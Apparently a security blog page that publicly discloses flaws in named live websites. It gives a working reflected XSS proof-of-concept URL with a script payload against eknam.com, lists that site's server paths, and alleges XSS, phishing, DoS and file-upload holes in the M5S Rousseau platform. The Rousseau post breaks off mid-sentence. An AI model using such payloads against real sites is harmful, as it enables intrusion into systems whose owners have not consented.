Skip to main content

Posts

Showing posts from September, 2018

http://www.eknam.com | xss, sql injection

http://www.eknam.com | xss, sql injection /web/htdocs/www.eknam.com/home/default_files/meta_tag_query.php /web/htdocs/www.eknam.com/home/default_files/contenuto_footer.php XSS xss can be injected in almost all the parameters. example http://www.eknam.com/blocchi_liv3.php?lingua=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3C%22it&pagina=torte.php&class= archived: http://archive.is/5X39s

rousseau.movimento5stelle.it - movimento5stelle.it 2018 | xss, phishing, DoS, file upload

In the last days someone have already exposed sensitive informations about M5S. I don't have/own/store/view those sensitive informations! After the "supposed" security breach M5S told to newspapers and their users that all the security problems have been "fixed"and that they are investing a lot of moneys in "security" with professional companies. I don't know what they are doing but, if true, they are mostly wasting their own moneys or those from their donors. Note that they already got an email message, time ago, and they didn't fix those problems specified in the message and available in a previous post. --- Movable Type is still the 2009 version (we are in 2018) and they haven't updated or fixed it. Check the previous post and the CVEs! --- They added an XSS protection but they haven't fixed them (XSS) in the scripts. It's possible to create "phisihing" pages (this is an example/joke). NOTE : what